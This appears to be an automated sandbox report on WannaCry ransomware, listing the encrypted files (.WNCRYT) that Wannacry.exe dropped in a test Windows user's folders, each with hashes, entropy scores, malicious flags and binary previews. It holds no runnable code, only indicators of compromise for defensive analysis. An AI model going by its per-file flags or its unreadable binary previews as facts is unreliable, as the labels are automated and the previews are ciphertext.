(R@U.t%E{].....Eu...d.N!O.;..mr..0...W.........5.~.).c.....E(d=.e...d.V:.;.....,....^.xQ..W.}.:..\|...sh"..]....L...VU..~~..z..l..'.y...U...i.=%Z.....v2_..A..da....Ky`...u..Qc..\o~.q..".T...$..\..o20E[..>=.e%[..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OVWVVIANZH.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.847112958001948
Encrypted:	false
SSDEEP:	24:bk3JXsykaEkRDzYFlNkcbrr3hEg79pRtKujzqoi78VJ2ba5pc2QID:bkiazmjNd/df79pRtKuPqoiIiWncnID
MD5:	F820565297D97D24E87D29D3BC6E6240
SHA1:	52E12A7D95158460849181F027A44F6550E571D0
SHA-256:	1B0976503E8EDBD0652DB15D96E9884B2767E4758842044BBA1CC09C598F0E1F
SHA-512:	BAAABEA8F7CD654BCF450108126C5C1429896B6D089319D15218E757626C814E585DA0F1A27E99AFD1F3EF286D9D156E9E4CFFCC71146D457508E20702FA1743
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....C1.% .%.A....Y.n&S(.....?w7c.......c.Ev..M.Z........rx..1.m.sY0.....E.;b.......<.'I0:..&u...#Z....1..G@@...<.5z...9a.{..@..Z.z....n..<....8...9}....../6./........N........."t6....c<x9.wX.&>y........FMt"(o.9d@.....2..].1[..p...u.SR.,G.0.z.{...6`.............R.s.@..4........E.v.{..:....r;..E.710"..g._..=f2^.a..#.[%C./.hf....t......X..~5...>t#...h3...(.......l=`...Q{..u.......0.>.;.KDS...3.......M.FS.>.....2}H...&..#........{m.....ELeD.K.D...+Fv../R.T.tM.!..W..).5j.......p...0#d.>..S.4b7.~.~.:...e.S/...z.]5..;a...4$A...p.=8....f.'.>~Qh.^..;D/N/..u..=.....<..j...V..sJ...D.4G.m...t...u...p.R.S.e.y...w-3c..1..X.Z>w..(V......ug....l.I./.V....7.z..N.m.'n..?C\E{...<d.....w..7...4_....`mKkO3..X6...~..7....%.....c...Z..._a....r!._.$.\|..!.m.1.).y^9.h..Q....l....ul..V...sV.T;.jn....L...d:..'M.!.......U.6S.T&Be\|..x..9K.s....N.`...>i+$v.QR..H..:?$....n.d.a^l...0.)f..ADl<...-............Z....RY....u[S.t==.. .A...<T.'...T.B.LM...h@.t.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OVWVVIANZH.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.842333278352295
Encrypted:	false
SSDEEP:	24:bksJ74NybLmUCTM7hnLmIHrmQVRqaCZjZSF5FAv5U7jAhZwih9y3Q8mJxrgZc:bksN4N0mtE5CaVRSSX3MhT9oQ8uNga
MD5:	78A2F1F437AD1FD387DAA74AE0DD0749
SHA1:	5B244969A90B11C378DD2509428B57C90B049A4D
SHA-256:	F9C1BC65851F96AF3CE970619286BAE3F7502F50B58B80B02E816451457B3C24
SHA-512:	EBBE5FD6076004E8309E4D803BAE561CAA1516672456BBCB75EB06237E8DDA2D672B772839CCB1856A93E854B5EC23D697E5960B8F6532B1A0702AD842D8BC98
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....d...D]?9.."..v.s.P....8:$..,.Z!;.......(.j.vo%x..]..,.!.....`.!..&....O...`..EC....N.rK.+.....ij... ......c....]...".z.`.G.#..]A....I#.{ ..?..+..X.n.}t:.;.:......~.e.3`.......8...b!..=^..#.......b.....Nc..mb.....U...O....9z...S....F.....................v......[/f.W.>.k.N.x&.".tN.......U...{.?.u.\|<.,.C.VO.m1k@.h..A..5?......1....U^...s....aOh..}..T[..=........O..\....4..E..?..g..P..Um...V.sz.4O8!.e.?^.~b...........12.(....h0.}....j....7..x.\.5.Kqm.......MC...Z..R^'..`...........'.B s.........K=.q..=T!....d...gk..W.k.m.t....t'}NO@Mk._.(....5.,....V.%..M%`.........J..F..g.0.%...He.\|..Z.1.q.IWNG......r.z..9..n.....Z.U.E......e.....I1{...:K+...W{.n.D....DU.9...54._I........~..R...n......C.....P..5.@..l..^.....V.-...n.u.r..C.8....?.9..B../$.&F.z-...5...y'...XQ...H.......J....0F[....b'{.....`F.*.y.M.i.. .?[....!.. . .rN\|..V...4.K.iWmXA..c%=.$..%J..b,....A........<w..#..6_/......4...1u..S~:..5..lC0..}...>...Q..<.n..cX[>

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.851657657742456
Encrypted:	false
SSDEEP:	24:bko3nFcJcc5ejhHiejCNoX5iz5fWr9kS5lUyEFJgQ:bko3nFcJcPLjCNoJw5OSS5CNFh
MD5:	04641338AB224D9F98437FA937759EF0
SHA1:	40BE28CB30D2D98AE889F83256944FE8D7118DB1
SHA-256:	F7814D7AFEE101830B9BAC10AB8648D2E34CE23BEA1BFD9D3FF4CB72F114212C
SHA-512:	7A1D05E95B3939690F8781F66D5A2337F12EBAC2FF55A09CBB1F48E15C67B676AA7C69B085DD61BEDD1E6B664CDA7DDEA48D7E35E4382E051012DD44034B20F5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....$...)...g.)....$.'^-.'.).>6..9s.F&I...s.V...W.x&.DT.t..qJ.....C.....].x-..N<.V.~...8..tvE.nC..S...8.z..r)....... 5;..).,.......7?.?^._ke.c^..A.Em.if<../.ez .^.w...b.tO,....Uf........wq..T.5..6f. ..I.T.q...h.Q'.P.8.>...LN&U..PbZ...[.3..n................1....Tb.1....m.jM.s.....o.....=&.#.)..........5...2..".......1.6Z.......W?[`...^.Kr..t....di#.K........@.3/..h......P..m..C.......1<....N...5_.......@.....B.$..$.._.I...[.%.6Y220dM.D....ow.S.!..Z.c..:xS..$.p...q.z..X)r.......B.3\|...Y.......@P.......A....pF....(J.#......E.f..zw!^.6'.b..;.[5.o5>.....#.tc.3\|=-.....\?t.. ..{y.6.j...ZKA..!jHS.yJ..`.}..b....S].wt....E9..I.B;;j.{A#.^O.".H!..1..$.x)=.S..?..._f.....@..H...;.E.M.sK...BA..G3...3a..)..j....).O..A..qT.[.&6o...Bo.<P.s........=...2mQ]...i..:ZK...ZY.-..Eb+u$+.W........W...i>......udZ....8..S...1a...?..L...<...(B.%W.3T6&.@....r.[UI..}.K.[.\..[n....m...p:hr)...4^=%.PE........8xr.2..eB..M..a...0bo.?[.^.L...y+....._B

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QCOILOQIKC.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.852790990325407
Encrypted:	false
SSDEEP:	24:bkyGmKv3kWui3VMXvHxsrZGrpmUlDUz7ErDods8/pBPbfgMjcu0zQJO5QHHp4CvL:bkyG3fkQMXvH7pmF/sDoFBTf5jPkkO5k
MD5:	68D3849081284A32E730B321D18B5FDF
SHA1:	558027D7E04643FA553839F4B7A1909D7CB25275
SHA-256:	D46BFADC27161D69A545E7965E37AA8C282495816CE6C1A36C3560F589342C6C
SHA-512:	29AD8E9541AAA9DF69F87215A6081CF41B6963722CCE91632EB580B53E81A85AC442B288FEEF4043A3844166DACBF695D2D6EF9CC0E78F9C61E2B6146DFC1D10
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......XI.w.u.=...<.R....T.J..&..$..0..2.0.......K........5!.WbB.L......a.u/^7../.&VF...R...(.c.Ig.7....#...{.3... ...T;.U..rh>U....I.6U2.^....q.........q....eqr@}..D?....p/R.tX..{/ZF.w..."..4.....'.@X.pe.U..a......P.....1.-....&.....R....f.\..M.t............CZ\|.hr%f$....M..:....MW.)+.q.R.......4...=..X.T....}....ja0@..;.SY.<%...C.h.3S.&TT.."~H.p..t.A.0{.y...;..-.#.{J......T...7U...T-.....C..V....GQ>...>...m.d....CWO=...,.`qp.,...D..D$.t ....J.h.:.qT..^4!..O ^y....\...C...g.=.Y..%........<..%r~[=..~6.......(.mH?B....Y.}..Y...%..C..>..\|.f}K..6m-..:..o.....J..<v-.[.\|.......:.....l.....\|.3.<..x]....5...^.y&e..3......\| .....b.B....Qu...X.-.l&<..<'`.z.-_k..../~w$....b..:M.....x.mW..n.UM.[.'W@..B.n(BFh.."..W;@...f.\..@.:._.Pz..+$r.[.....rS......g.K...O.GWe5).c...}..#=y..:.5...".i..?/.(rm6'.....y.g..F.2A.x..i.......a9.w).*&.7.WP.>fd1J...62.>"ta..{.a'\..Y^A......So;.c..~M...~.....+(+...A.....!X...X.l..B..G.T...........^G3.....T.R.wm.E...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8504912972354735
Encrypted:	false
SSDEEP:	24:bkyI+hcdrIVFvklPlEFbbDokk0SjSi5jxfG9+lv7MOu0BzOVjqjgyBgFLDwAe:bkylcd8bMlNkbpm9G9+5MXjOBw0P
MD5:	EDABB566A53E0BEAB75E8FC914C7243C
SHA1:	F0449988D1A0F7EEA07A440A9784EF19007C6A89
SHA-256:	D352EF338EE8D70E8FFD6B63FF3E9E3D64707A179B7944E47AF07E5CAE5A6797
SHA-512:	B72D9DA168720C09AF932550368D69D6BBCB6CCD488523B0B5B0B22906657D066C1BF55DE050134C7008700AB6673ADA50F17EA6166F45E67D14E462509A4D57
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....4...2..t.?(....nOoI{..........,..r... .".....e.^.`~...5..5..[..>....7.............-.^.......Vt'..0/wb.W.I#1...r.3@....:."8.:.a..bd....(..}...F..E..C..._.... .vRL..W.s.g.eg.n........G...S..7~...$...?..@.....bDt.N,..=.a9.@5..M........F..U.=..............l....!...SZ.Af....\.).&R.c{{J#.z.B^..$...@Bt>.v...!.9...XI...r.......JM..(.".Fw61.:...zYaT...1..7....YP..Y..H.6.....nZ.....][......1...........\|......'>..^bE..2.A}"...........PJ.B.y2.2.@..D.?...T.0.y...jf........._.s..5@W.:N......S...Q..4.^..8...+........s...!.......<..C.~Ga.#8..}r.$..\....h....L./kr.....W.6.I."o.y....h0.e.P.=X...x..Q....U[.O.r,..UT.&zv....A.m.. .!.o..L../.[.....Y.k.w=..f..^.7N.6..d<a.>..B}.i.D..x\.......xSZo.m.P...u....y.ur.x?.@.,=.F)1.U..;5.9.H@..B.I.0.yb.........!J.G...c..N\|...L..c....}.f~.S.9.O.8.U?B.......OS.E.....[<C......`.6.\|D.....B-a..k.z.I..S.MD=...l.x.....;.uA.e.m5..e..}II.i........4.....*..xO....4.[8..<.%;........nB.....\.I.3....[."W................x3

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\TQDFJHPUIU.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.860005240959193
Encrypted:	false
SSDEEP:	24:bkn4OpqboNAqhiZEdzhKChjJe2uazPnKuHRzN4KBgSWySS:bk9qbU02dzhhVzuaLRHNN4KBg1LS
MD5:	2FD9D65C491FC37289E11045454960C4
SHA1:	35C7D6E98A254C4755926695416D5D0D02167275
SHA-256:	94F7650A123CE1652EEA914BFF9790F2D4B20C07A2EB34B1BABEAF04C44BC268
SHA-512:	E7A37146554B10ED35158C5DA00B2883A472E4E028BCF33BA054ADEFD3127239AB648B986FB1B03F582139648B27D72CF91124D1E782076E585FAE7CD0AA6F66
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...... ..z._lkz..I....E...Y..Y...[..q..............QY6gwm+.aBb......M....D.2k...+.=....W.E."..u.enD..9D..f.0.....f.[.....U.%....?..../x.Z]"...y........[.O.>..,.....R......d,....f@.....0v..!b<.L\|..u....6E...E,E..c........9.^.#.)ma.......:.............n..TU...\.<\.....0B.@.3...8.7B..5&.....K.l..U2T....-y.A..._.#.Jt.+..2j.{.```...`.fo]......G'..tl....n}3),...o.U.7...../.....G~....~...e=.&7.P.....Z]v..e....4.i3....v.)...I:f`..)..#..Q......%A...j.jr;T..0#..5a..!...rA....].......r.{.o.u....cxX.......w...\v....Kv.,40A/........u.K.jS.w.g...~.<..\....u..85_9.....<.Ztu0H-W.8.,......3{tb....g....n#Dtxn..U.RK...\|.[9..........%...#>=[jR..8.....i.?...S...F#O}...dWRS.....4.2w8E.....p..>/.!..n.....5%.s....Z...[.....>S...`...v.q..[_f84.4A..k.....v?..\....."f.`.......`.K...L?.....4B).....#.(.P`v.....G...5y..p.^M.gD7...<q.../..w/r..El....b*].@....../..........XO...q.LWoj..}.0..14..&1....f..{/..Q.^....#...9..N..}..Tx ...K..}$W.CC...x.....;q...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.85956269749926
Encrypted:	false
SSDEEP:	24:bkiyu6t9dIzlQ++m+GP2P814cnKgapmd2BNXzjOCBQ9N3SlRVVmJ:bkiyu6WW++m+d0142G+3STVV2
MD5:	F28B90892F96C5E80C231099FB5F47D4
SHA1:	8B3EDDEE8EC5A7E53D496961F098555F05C3E499
SHA-256:	A2A7B55CFD6E3091B23778173D5945C4C6366B667410F3AFB978AA4C1F12AB6E
SHA-512:	D85B7CBF96BF1875FC89A9293C9A305E5D4D1E926C68DA87B16326DBCA800C9D2C11F7040D07E80A737E975855618BEF621E9BA6CF104C10841DE94B1692317D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........^.@..0.O._.:......G.GN7.......[..l..V........L...^.VB.p..%..V.jjc...l<T....?Y.{k...R.D.V..\|.......p.d.....WT..#]K.@.......X.^.....F.+3.....Y.........xmD..TD......}F...X.....<.q....'7.t.Z..imG.I..$.o..N^P...Y...g.T&.u...h+.$..9{. .d~.B............._r....lz..u.....Q.^#...Y.........npm..!CRT...lfH.........q..E....+...q2R"@.h..N...:5+.......}.....E.PX.Y>c....q......9....d.9-.......N1.Z.,.w[f......o.jSQW.h.ws.9t......e%.fdV[...&....@.j...{.."+.....o...a4Q.....E;..8.O.jD(.Nq....N3.PW...m....]..g-%. >......yv...1.....Y.O.M...Z!.7.L..1.J%,.V..T........^...J<...%.<O>..:...]-+.k.R.A.,.g.]...a.T..'.\|..nw.$..(...... ..p.;9....Q....C.....[...oD.f.j\|Hv8.0.X.......K.t.DsF.4.S.Gr.@<...B.a7u.Nr4.@.9.zO......f.....P..". ..;[..\|...u+,..:......C.Y..6F..'s....Q!.X......@..$...Q.NX...7w.g...:O.....r.4.M.w.q..yw.T..\|l..c....~..-.G..E.s>hf.#..,..i.pcy.s...u.C....{W...v...b...k..k.h..9..I.Ida..5.I2.................bB..m.Bxn.....Ws.V.....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.836228816038545
Encrypted:	false
SSDEEP:	24:bk0GbGU9Gd8mblQwJBx32rpJgZI25HMG63ftBiIkd4hQb1Lkx+pS/SW9AvLXx:bk/V968mbJWV61lMGifZApRwx+pwSWG1
MD5:	E97D698E8995CC57F4B13B7A568F6B9B
SHA1:	B0208C7A06988F95FE54DED5F538FCB3D5D7598B
SHA-256:	3C973784D6BAEB79977CB8AFD230BC8789C228B278EC1FD187FF6D900A4B7163
SHA-512:	49C37C658B9FA28B0116557BB70D776BFEE4F19B31BE2533FF4F15AFD349E669FADF21F9F972C360318BD81394DFE232998B9CDF3E979E1948BF914200A0F784
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....;....Z.6G...nX."..:.Z.?...>...T..ZC...i..h.65....3.U.......Q....d".^.z.l.JK.....f......kX....\|.X..K.o6.7.....u...6.....P..Lx.P/t..z....Q..ve.. .`..R.......n..D...~.......EJ.....8^`.].c.7........[.....N.f........]fv..9..{............He.njg0-pw.x.].............y..cN.F.z....h..Q.%...}.../....l..gw75I.V.+Xc.]....._.p.c,.Z..e=. ...%..U._..ga.H....0bM.s.H.....b.r...Sj.`...+.e......loff..n. ....ujM_......5..C#.....<.;..s.K...0..1.O.#$...........}..h.X.>.iY.h..Xsz..7Z..,.S......h..[xx....y"..M...K.+.......7U%.d.}.2.../Q..=p..s:,...gA.pS....HU&!B..\|y.o..W.......K..%.+Y....E..0'...U...6...Y....o/3...X?og.fqiB.xb..+a.E...}..$lc....s.2.(....\|5%..K.>!...2:a=%.?.&..d-Z?....[....6+...z...3.....<.....C..........5'.....H.i.T..X.+...^Gx.t...[.....WN.....[.&v/.~.'C.....Q..Vy.Ts.qBLv......w....A"i...}.K.......@..e}..0...}..D.3V...{.b..1a...c..2.x...$.........e..A....(tQ........6...y.9.q.......J..0...VF....k...A_..nO.....>3qI.=J....W..=s..j:yMN..pE.6..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\WSHEJMDVQC.xlsx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.840411662321956
Encrypted:	false
SSDEEP:	24:bkuyPq2nQr1/GMkYts0x8VZ3VJPpApb0QE1cbX4p458tGSyYTn0gj5AnDVnfQt:bkrxQBOPYoZhou1fke3yYwy5AnDVnfQt
MD5:	D37483B10DCFC217F7BD697FFA124303
SHA1:	BED5FA6F16BCA2AF2D9212AB9F142B9C17F4DBB9
SHA-256:	BAAAE42522AD0BAB4342B94353C2A435163C38DA87A70243E3B42A80B91C37A0
SHA-512:	4BF182B99A15D692C93861BEC586D8731D23040F93CB928AA746E1BC313EBE7A2BFF4B692C7CD4AD9C7CD282D3004A53B4DEB7213DBB436526AD368693CEC19D
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...........N...R..3N4I.X.@uh.......,L.Q.)[.(...}.i...M......03..j.fs.1..\9.....U,..CfdX.X...?..2.:.<...{..q........$..n.+u...~..@.....s..3.uS....?...Yf{.0..a......U...2.mk..........O....w.,.,!..A........w.."..M.h.-....!.<..k....`z........{.............../..c....[..[.34..`.......h..K..`R.d9@......(.z%.k.8.W.........jcK0....x.....p....x(.?L.<..\|.q..4.{6....;.Hr.a........./.......s.t9YI....P...p8.(..;..d..].+......J/..=.k.3.. -..../.:.t.Z..k..........T.\+.AYw......^....P..F>.s.6n..].z..fu.v........e.Z.0u.6...u.IF.u........%.H..F...9..b{...A..>EP RQ4.7.e...t..L.UW.....]okq.{...k......S.(..../r7.b........4R._....-..E...($..g.%..q.O..SV.1e+.n..<...I9,.....S.W..Io.....N....0h1....w..ab...A..G?.xN\|..5. .........K.1.)........+]....)....`..@....Yo.vdl.r.Z.e..n&^.RJhX...... k.....0...z.t>]f..h.~...-_.Q'..2n@...Q.[u.......eu\|..:...A...R.M.;..<.....q...\|.f.s.c..4...q_..C.$Z.7..^P5N5-..... .......7m...."Z....\|b.....Q....Hs.X.....l..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\XDPQCPDGHC.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.821917770624735
Encrypted:	false
SSDEEP:	24:bkL6LWszzq4n6dFyBwCGQXqmLJ/lNdUY++hmt9hMU5+UnROW:bkGq46dF2wCGyl/LdUYGnyW
MD5:	440907D1F6309FD01BFFB46E13FBD9DB
SHA1:	87C5EA37002BBAFFD215C855E057A043ECA63B47
SHA-256:	EB9E39B9E62E9F2A210E1B3FC939878FA1EB605BFDA7F218BE62F88ED2182487
SHA-512:	F80C999D39550AB59B81B2A5C5FEC3F8E44BD80F090BC81084947E9BA5B7C651D8ED556C1F4980E1F37CB728657AD34B1A6D632B973743BCDB25323846302D75
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......4.D.0.p.F..."P1.._.&.......C...,Is.Z...2......E_.%....z.S.."4...h...7.w$....I..,n....N.=^..9T.g....q..+....#=..L.}m.iFX:D.^".f./.T.EF.X.I.e..c...C.....oz....v..eo......@.B.?..~......p....3./..o.."Bq.LG....Y.....rn.A.............U(.r..H.V..............Q..T...o.R..7.>..C..a...]..Y.!s.S]?......n.DS0..:....X.......&HD..j..+...p.lSs...h...m.....F.v.0....y.P..l,!....6{..w[.....r.Fv.....Z...w..7Gu6j...Y0I.!....,...i....zV*......$.2`.\|...W\|.g..\{.......Z....GQ.;[...<..p.Ap.......s}..h ..>..E....."..B...7eV.Z2v./.C. ..E#.SS....&.C..... ..p eAZ.../L.JP....#g...S...Cz...M42]@...)....0..]~.Kk{~C..._.=(.^V6=..n.qiq.z..X...NC.K......gTw...N@...qD...._.~.dPw..........9....G......bvZ..^.....P.g.<.c..y.....bV.`...#......)Y..$.$......R.....y.E..ZK 3F.<.t.q.?E.w.t;...I.@.c._...).<?iZ.."J_....n=....^)n.f#....hr.c(u^..H...to...f.g0.?..<?Q.,>(....r@I(S..H.....x.h.4[w...O.y.I.x.8Sh.2..2.......O...).....{.....^.y;.w......R.c9, .7C..%...N'

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\ZIPXYXWIOY.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.863386364451782
Encrypted:	false
SSDEEP:	24:bkjgVzI0TR7Go8n3eu4QYNx8tFWvszWmtX7xzyCBJM+SkwE7HY:bkSMK7GoQz4QYNutGsfrxOCBJbSk9HY
MD5:	6BD3139FCE80F338E7EA81AF40F88DA9
SHA1:	E2BD8544452C983682B879D83418E6852AB80646
SHA-256:	08297903D04DF49566FDB24903E7E1D17977CD97F28A208EE5065368D62982C5
SHA-512:	30D8125026D11F9CB73D43DB5F97F6F7BB72A2C9274A343622A985361FB8EA262775A28867A88D63A9C8FDF1CA0704FF0E331E6F8E6688568C8AA7E5CE862689
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....1`..2+..../....}.k,..X..D...v.9..AC)w.w.F.....L1t..J...e..C.(.D..Lvv...,.....f.($+..t&.;..7......l..x/."`M.'.?K..`d.......6v......d.rQ...{..;V&MAu"WC...ETd...#..I..`.0.YR,S.L..$....sE..&.....y^....B7..T@..L.<.......C........e.4.5..6.P..:...9..............R.PjV....N.D.-.....~.{...t!.9Y5S.8lLs&..\|.[u.h........._.....B_....N..<...'....\.\(...%V..;{..u.Z@......a..ga..9.......<.......@...4@....m..E....+..$3T..e.c.,.3......%.T}U/....@#......[.I.`....f..'.e..V.....0r.......y.M....)...(..R....w.6".........`../...+g$........k.] .W.>x..Vt.4.._J..C.F..........>.8k.iL...L./....2o=..EC....h.....Jj......wO.5.b..D.p..#,......]i.!.....Og.......D$.-......x.B.{X}.mx.m#......%....0...-...h..-..5.BX....d.8.....@.......D.6~..lJ..Ym.H.v...iC[..0...UO!.-.-.@.}1x0...4sq.R..n.k..g2%.R}.u]..7.B.q."Y..W..n.W...a7x.YF.g.IP..R.Xl.g..... H....LO....P..>4...".fJ..n....Ij...1nc...6..'8.N...(D..Tt...e...=...z..'1..![J?LV.,lt...Q!....]T7....:hI.!\|..#I...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	40984
Entropy (8bit):	7.995449754184206
Encrypted:	true
SSDEEP:	768:6IcFA4ymDDvapmhhb7O7AtXiYv2sIuPNOD3f7P1AAJTuCNtNeuc:WW4yNpwlOw/+sIvra8u+tNer
MD5:	82338F1E053EE06C72DE147E8D5E468B
SHA1:	7D2B01667D4393DE094F4A988B8A35A5F67E0F75
SHA-256:	A3594F9C93D045F99FD35DE8C491C63D079CF4CD86CBC2354652B5EA43E0EA5D
SHA-512:	53436DD3E7D7E3AA2448A6936843AF7CD0D094AE8E4157DD38278232F8800907DBD033009951EC6F4E08FC371471BE34587AC925E265DE9DC98774E6793EACC3
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....^.$.u..f.hZ..Bx2......7..r.k.R....'F......v.r...%..H..._..=.I(h.0@..Mx ..N.b..x.........4.I.a....A...!...8?.X..Y...~.a[.S.<.E....T.b....@w..%u(...G.yr...S.'....z....`..(:.9.}...y....-4...T$......^........fi1......e...lSCi...dO.U..<+QG...............?..Qr<...]{...x.....V#...'..R.\|..4k.......>.[.\|.&..1.0Q....2....j.H..b.u....J..lF..8.}...`....V.<.bb.5...L+.Z...U.1F.J...\|+TmYa).+..nw..e...!.&.!18.}...n..'B.s.......S..w.....M.))8U.....`.>Fia....z.E.R`0v...9jc...)q.D.a...xH......}.n.T..r..`.u.!.ZZ.]}Q..l..$0.TB.f...+.qR%......yR.++j...;..&H..bl...............5#.....K$".I'.&.%...58..7.,w.0t./..qa.:n3...[....".Oa%.h.qLnp...AV.....$N....~..U.[...p......Jk.4...H...%@...5.6;B_...wF....'.]..@J..@.]..."..g.BV.uJ..]...Zo.....j..Si\H..b.........:..dK..x.jq.@.@....Ui.~&P...S"...,...k....G..".b......S........+E=4....j....z...',......S..Y.`. ..o..[P..AT.&..L.l6.Z.L)..:...7.'....T..S.b?.2.........8....w[]...\qy..3<H..1.<..MA.p

C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	125288
Entropy (8bit):	7.998543968126807
Encrypted:	true
SSDEEP:	3072:aiHgFQoZhCCkHWcwq7/0Tb/H63O21ItWbe:aiHsQEzcwqbKb/H6351ItWC
MD5:	67FC7328B83B7707321BEFF7F9C8BC1D
SHA1:	B78896C42D73418077862657B21669265CD2745C
SHA-256:	F3F334038379718E305195A9BD3D1C4F575B928E12FA621E73B77170D1AB8599
SHA-512:	D2ADC80DAF311B4DEB5692F7305D68CA93C5BC24DB14783634A819AC2668C0B7DF701A0CBAAA0B7C85F4319B8F36A8E4EB25D8EC991D29E4AA3CDD66F31067F6
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....}j...v.V.h......%.X.(..ox.2....'.........)....q.P$kCF.k...._YUa}...f.H..'8..]..1.....Q.VS.y .....j...[e..."....w.N.U..L.0.....vJ..k...q.+....^...h......i.....Nt.Q.`..I.T...C..y.SA....EtX..rA=...h.w.^.9....v....oW$......+...q..u.t.n.sI^.........D........b.].}.....t9.c..w....N..=.B...i..\..B0..[...).O}X>.-.pT..qf...h.D[.#I.y....5b..Q.'..zi.....E!{...0$..I.....K...o. ..l....5R.....Fm_._.{`.2Zo}..e.eh.0..........W....g.d3Uh7.... \|j]..h.~......\..S....4..c.%.H.#.....[..Q..g....3......>...Iv.:h..$......4....u....E...'E;V....l7...ip]Q....B~.k.\|....TL..H.&..m...l..)e..i_...._D.7....:R...b.u.R.f......g~..J.....p.h.\|..D4I.Z&..o...'........XI...3.e+\|..kI.m...B.3....).B!.t!......h.z.0....8.\P.K...G)p..:Q...y...J.........u.........so."..K...-..G$.:gO..8.8{?.8.t....G.G.0G'.E.....h..I.)xw....%m..Z.-.N...+J.<...-e..C...4z..~.}.4.....h...........O....H.+*...i.XX..`{#.m......~....e.[..&.g..8.gM...0.... .k..46..C..4f.&.fO3.i....R..1....G%

C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	125288
Entropy (8bit):	7.998543968126807
Encrypted:	true
SSDEEP:	3072:aiHgFQoZhCCkHWcwq7/0Tb/H63O21ItWbe:aiHsQEzcwqbKb/H6351ItWC
MD5:	67FC7328B83B7707321BEFF7F9C8BC1D
SHA1:	B78896C42D73418077862657B21669265CD2745C
SHA-256:	F3F334038379718E305195A9BD3D1C4F575B928E12FA621E73B77170D1AB8599
SHA-512:	D2ADC80DAF311B4DEB5692F7305D68CA93C5BC24DB14783634A819AC2668C0B7DF701A0CBAAA0B7C85F4319B8F36A8E4EB25D8EC991D29E4AA3CDD66F31067F6
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....}j...v.V.h......%.X.(..ox.2....'.........)....q.P$kCF.k...._YUa}...f.H..'8..]..1.....Q.VS.y .....j...[e..."....w.N.U..L.0.....vJ..k...q.+....^...h......i.....Nt.Q.`..I.T...C..y.SA....EtX..rA=...h.w.^.9....v....oW$......+...q..u.t.n.sI^.........D........b.].}.....t9.c..w....N..=.B...i..\..B0..[...).O}X>.-.pT..qf...h.D[.#I.y....5b..Q.'..zi.....E!{...0$..I.....K...o. ..l....5R.....Fm_._.{`.2Zo}..e.eh.0..........W....g.d3Uh7.... 